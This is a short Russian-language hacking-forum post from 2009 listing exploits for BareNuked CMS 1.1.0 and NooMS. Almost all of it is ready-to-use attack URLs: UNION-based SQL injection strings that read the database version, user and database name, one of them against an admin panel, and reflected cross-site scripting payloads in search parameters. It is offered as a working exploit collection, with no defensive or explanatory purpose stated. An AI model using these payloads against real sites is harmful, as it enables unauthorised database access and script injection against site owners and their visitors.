12.12.2009, 15:30
|
|
Banned
Регистрация: 07.05.2009
Сообщений: 103
С нами:
8954306
Репутация:
1588
|
|
BareNuked CMS v. 1.1.0
CMS = BareNuked CMS
SQL injection
url - http://localhost/index.php?term=
Exploit -
Код:
http://localhost/index.php?term=1'/**/and/**/1=0/**/union/**/all/**/select/**/0,concat(0x76657273696f6e0d0a,0x3a,version()),0,0,2,0,0,0,0,0,0,0--+&search=search
Passive XSS
search ===> "><script>alert();</script>
or
Exploit -
Код:
http://localhost/?term="><script>alert();</script>&search=search
NooMS
Passive XSS
Exploit -
Код:
http://localhost/search.php?q="><script>alert();</script>
SQL injection in admin panel
Exploit
Код:
http://localhost/admin.php?op=comments&action=listarticles§ion_id=1/**/and/**/1=0/**/union/**/all/**/select/**/1,concat_ws(char(42,42,42),user(),database(),version()),3,4,5,6,7,8,9
|
|
|